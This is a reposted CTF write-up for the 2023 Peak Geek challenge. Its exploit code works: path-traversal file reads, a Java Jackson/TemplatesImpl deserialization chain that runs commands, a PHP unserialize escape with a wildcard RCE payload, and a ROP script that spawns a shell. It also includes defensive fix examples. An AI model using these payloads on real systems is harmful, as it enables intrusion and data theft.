China Telecom 2023 巅峰极客 (Peak Geek) Cyber Security Skills Challenge - WriteUp by EDISEC

admin, 2023-07-21 12:54:58

01 Web

1. hinder

Authentication bypass (unintended solution): the filename parameter of the download endpoint is not confined to a base directory, so path traversal reads arbitrary files on the host.

//hinder/download.action?filename=../../../../../../../../../run.sh
//hinder/download.action?filename=../../../../../../../../../oh_u_f1nd_me
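Added example, not part of the write-up: the server-side check the download endpoint above is missing, written in Java since the target is a Java web application. The download root /srv/app/downloads and the sample filenames other than the write-up's own traversal string are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class DownloadGuard {
    // Assumed download root; the real application's directory is not given in the write-up.
    static final Path BASE = Paths.get("/srv/app/downloads").toAbsolutePath().normalize();

    /** Resolves a user-supplied filename against BASE; returns null unless the result stays inside it. */
    public static Path resolveSafely(String filename) {
        if (filename == null || filename.isEmpty() || filename.indexOf('\0') >= 0) {
            return null; // Paths.get() would throw on a NUL byte anyway; reject it explicitly
        }
        // resolve() returns an absolute argument unchanged, normalize() folds every ".." segment
        Path target = BASE.resolve(filename).normalize();
        // startsWith(Path) compares whole components, so "/srv/app/downloads2" is not accepted as a prefix
        return target.startsWith(BASE) ? target : null;
    }

    public static void main(String[] args) {
        String[] samples = {
            "report.pdf",                          // constructed: legitimate name
            "../../../../../../../../../run.sh",   // the write-up's traversal, normalises to /run.sh
            "/etc/passwd",                         // constructed: absolute path
            "sub/../../oh_u_f1nd_me"               // constructed: traversal after a subdirectory
        };
        for (String s : samples) {
            Path p = resolveSafely(s);
            System.out.println((p == null ? "REJECT " : "allow  ") + s + (p == null ? "" : " -> " + p));
        }
    }
}
```

Only the first sample is allowed; the other three resolve outside BASE and are rejected before any file is opened.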

2. url

package com.yancao.ctf.test;

import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.*;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.*;
import java.util.Base64;

public class exp {
    public static void setValue(Object obj, String name, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // Generate a class extending AbstractTranslet whose constructor runs the command
        ClassPool pool = ClassPool.getDefault();
        CtClass clz = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clz.setSuperclass(superClass);
        CtConstructor cc = new CtConstructor(new CtClass[]{}, clz);
        cc.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/bash\", \"-c\", \"cat /F14gIsHereY0UGOTIT > /tmp/file\"});");
        clz.addConstructor(cc);
        byte[][] bytes = new byte[][]{clz.toBytecode()};

        // TemplatesImpl defines and instantiates _bytecodes when one of its getters is called
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", bytes);
        setValue(templates, "_name", "xxx");
        setValue(templates, "_tfactory", null);

        // Strip BaseJsonNode.writeReplace so the POJONode is serialised as-is
        try {
            CtClass jsonNode = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
            CtMethod writeReplace = jsonNode.getDeclaredMethod("writeReplace");
            jsonNode.removeMethod(writeReplace);
            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
            jsonNode.toClass(classLoader, null);
        } catch (Exception e) {
        }

        // BadAttributeValueExpException.readObject() calls val.toString(); POJONode.toString() reaches the TemplatesImpl getters
        POJONode node = new POJONode(templates);
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        setValue(val, "val", node);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(val);

        String payload = Base64.getEncoder().encodeToString(barr.toByteArray());
        // System.out.println(payload);
        String encode = java.net.URLEncoder.encode(payload, "UTF-8");
        System.out.println(encode);
    }
}
flag{QxJEF6FCgERtwaxAXbC5Fy5N47bjUCy7}
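Added example, not the write-up's code: the payload above is a plain Java serialized object, so the defender's control belongs on the ObjectInputStream that reads it. This assumes the application deserialises with java.io.ObjectInputStream on Java 9 or later, where ObjectInputFilter is available; the filter pattern and the sample inputs are constructed here.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import javax.management.BadAttributeValueExpException;

public class GadgetFilterDemo {

    // Patterns are matched first to last: deny the classes the chain above is built from,
    // allow only java.lang / java.util, cap the object graph, then reject everything else (!*).
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;"
          + "!javax.management.BadAttributeValueExpException;"
          + "!com.fasterxml.jackson.databind.node.**;"
          + "java.lang.*;java.util.*;"
          + "maxdepth=8;maxrefs=500;maxbytes=65536;!*");

    /** Deserialises untrusted bytes with the filter attached before readObject() is called. */
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a plain String, and the outermost class of the write-up's chain
        System.out.println("benign: " + readFiltered(serialize("hello")));
        try {
            readFiltered(serialize(new BadAttributeValueExpException(null)));
        } catch (InvalidClassException e) {
            // The class is rejected when it is resolved, before its readObject() runs, so the chain never starts
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```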

3. unserialize

String escape in unserialize() (length-mismatch injection) combined with a letter-free RCE payload built from glob wildcards.

root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&pwd=";s:3:"pwd";O:7:"pull_it":1:{s:1:"x";s:21:"?><?=`/???/??? /**`;?>";}
02 Misc

1. FoundME

Search the metadata for the flag; fffflag.avif is found, and the image is extracted according to the AVIF format.


2. song

flag is not here

An archive is hidden inside the image; password_hint


DeepSound with password 123456


Ook! to text gives the archive password


03 Crypto

1. 密码一 (Cipher One)


Plot online: https://www.desmos.com/calculator?lang=zh-CN


flag{Funct10n_Fun}
04 Re

1. g0Reu

AES + substituted lookup table + per-byte key addition and XOR with 0x1a

#include <stdio.h>

/* Undo the outer two layers of g0Reu: the 16-byte repeating key addition and the XOR with 0x1a.
   The table substitution and the AES layer are undone separately. */
int main(void) {
    unsigned char key[] = {0x77, 0x76, 0x67, 0x69, 0x74, 0x62, 0x79, 0x67,
                           0x77, 0x62, 0x6b, 0x32, 0x62, 0x34, 0x36, 0x64};
    unsigned char enc[] = {
        0xE6, 0xCE, 0x89, 0xC8, 0xCF, 0xC5, 0xF5, 0xC9, 0xD2, 0xD9,
        0xC0, 0x91, 0xCE, 0x7F, 0xAC, 0xCC, 0xE9, 0xCF, 0xB7, 0xC0,
        0x96, 0xD4, 0xEA, 0x92, 0xE2, 0xD7, 0xDF, 0x84, 0xCB, 0xA5,
        0xAE, 0x93, 0xA6, 0xCA, 0xBE, 0x97, 0xDF, 0xCE, 0xF0, 0xC9,
        0xB7, 0xE1, 0xAE, 0x6B, 0xC4, 0xB1, 0x65, 0xDB, 0xCE, 0xED,
        0x92, 0x93, 0xD6, 0x8C, 0xED, 0xC3, 0xA3, 0xDA, 0x94, 0xA5,
        0xAA, 0xB2, 0xB5, 0xA7, 0x55};
    for (int i = 0; i < 64; ++i) {
        /* mask the subtraction to one byte and print two hex digits so no leading zero is lost */
        printf("%02x", ((enc[i] - key[i % 16]) & 0xff) ^ 0x1a);
    }
    printf("\n");
    return 0;
}


05 Pwn

1. linkmap

#coding:utf8
from pwn import *

context.log_level = 'debug'
# io = process('./ezzzz')
io = remote("pwn-12b3fb054a.challenge.xctf.org.cn", 9999, ssl=True)

# gadget addresses taken from the challenge binary
pop_rdi = 0x4007E3
pop_rsi = 0x4007E1   # pop rsi; pop r15; ret, so each use consumes two slots

# first stage: overflow, set the new frame at 0x601c00 and return into the read routine
pay = b'a' * 0x10 + p64(0x601c00) + p64(0x400752)
io.send(pay)

sleep(1)
pay = b'/bin/sh\x00' + p64(59) + p64(0x601c00)
pay += p64(pop_rdi) + p64(0x600fd8) + p64(pop_rsi)
pay += p64(1) * 2 + p64(0x400606) + p64(0x400510)
io.send(pay)

pay = b'/bin/sh\x00' + p64(59) + p64(0x601c00)
pay += p64(pop_rdi) + p64(0) + p64(pop_rsi)
pay += p64(0x601040) * 2 + p64(0x4004e0) + p64(0x400510)
sleep(0.5)
io.send(pay)
sleep(0.5)
io.send(b'\x90')

pay = b'/bin/sh\x00' + p64(59) + p64(0x601c00)
pay += p64(pop_rdi) + p64(0) + p64(pop_rsi)
pay += p64(0x6010d0) * 2 + p64(0x4004e0) + p64(0x4007DA)
pay += p64(0) + p64(1) + p64(0x601040) + p64(0) + p64(0) + p64(0x601c00 - 0x10)
pay += p64(0x4007C0)

sleep(0.5)
io.send(pay)
# gdb.attach(io)
sleep(0.5)

io.send(b'a' * 0x3b)
io.sendline(b'cat flag')
io.recv()

io.interactive()

Originally published on the WeChat official account EDI安全 (EDISEC): China Telecom 2023 巅峰极客 Cyber Security Skills Challenge - WriteUp by EDISEC
Repost link (CN-SEC中文网): https://cn-sec.com/archives/1898001.html